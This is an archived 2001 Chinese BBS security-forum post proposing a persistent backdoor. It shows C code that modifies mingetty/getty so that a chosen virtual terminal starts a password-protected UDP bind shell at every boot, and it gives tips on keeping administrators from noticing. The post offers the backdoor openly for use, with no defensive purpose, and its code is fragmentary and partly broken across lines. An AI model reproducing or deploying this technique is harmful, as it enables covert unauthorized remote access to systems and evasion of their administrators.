荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: lvyou (让一切随风沉默), 信区: Security
标 题: 一个很不错的想法(tcp后门)
发信站: 荔园晨风BBS站 (Sat May 26 13:24:19 2001), 转信
发信人: lgwu (乱世糊涂虫), 信区: Security WWW-POST
标 题: Re: 一个很不错的想法(tcp后门)
发信站: 武汉白云黄鹤站 (Wed May 23 11:27:29 2001) , 转信
上次在nsfocus提起的加载在mingetty(lnx) getty(bsd)里面的后门的想法也不错
.
#define UDPTTY "tty7"
ttyx这个虚终端将失去作用,所以一般放靠后一点,免得被管理员怀疑
其实就算他切换到这个虚终端,也很少会怀疑什么,毕竟终端窗口失去响应很正常
.
然后在mingetty/getty里面加入这样的判断
if (strcmp(tty, UDPTTY)) {
while ((logname = get_logname ()) == 0);
execl (_PATH_LOGIN, _PATH_LOGIN, "--", logname, NULL);
error ("%s: can't exec " _PATH_LOGIN ": %s", tty,
sys_errlist[er
rno]);
} else udpshell();
exit (0);
udpshell函数是启动一个口令保护的udp bind shell.并且口令用md5加密,防止被
其他黑客
滥用.
int checkpasswd(char *buffer) {
unsigned char digest[16];
MD5_CTX context;
int i;
if (!strlen(buffer)) return 1;
i = strlen(buffer);
if (buffer[i-1] == '\n') buffer[i-1] = '\0';
MD5Init(&context);
MD5Update(&context,buffer,strlen(buffer));
MD5Final(digest, &context);
dec2hex(digest, ascii);
return memcmp(ascii,CRYPTPASSWD,32);
}
.......
if (!validpasswd) {
if (checkpasswd(buffer)) goto kickout;
validpasswd = 1;
old = time(NULL);
continue;
}
new = time(NULL);
if ((new - old) > EXPIRE) {
kickout:
validpasswd = 0;
sendto(sock, 0, 0, 0, (struct sockaddr *)
&server, struc
tlength);
continue;
}
呵呵,这样每次启动就可以自动把udpshell启动起来了,而且非常难以被发现,我
想管理员?
?
少会怀疑那么常见的进程吧.
--
※ 来源:.武汉白云黄鹤站WWW bbs.whnet.edu.cn. [FROM: 61.135.132.185]
--
┏┯┯┯┯┯┯┯┯┯┯┯┯┯┯┯┯┯┓ ┏━┯━相━┯━將━士━┯━┯━┓
┠○┼┼○○●┼┼┼┼┼┼┼○┼┼┼┨ ︻ ┃ │ │ │╲│╱│ │ │ ┃
┠┼○○●●┼┼┼┼┼┼┼●┼○┼┼┨ 國 ┠─俥─┼─┼─士─┼─車─砲─┨
┠○●●┼┼┼┼┼┼●┼┼┼●┼┼┼┨ 棋 ┃ │ │ │╱│╲│ │ │ ┃
┠●┼┼┼┼┼┼┼┼┼┼┼┼┼┼○┼┨ ︼ ┠─╬─┼─傌─相─┼─┼─╬─┨
┠┼●┼┼┼┼┼○┼┼┼┼┼┼┼┼┼┨ ┃ │ │ │ │ │ │ │ ┃
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.28.29]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店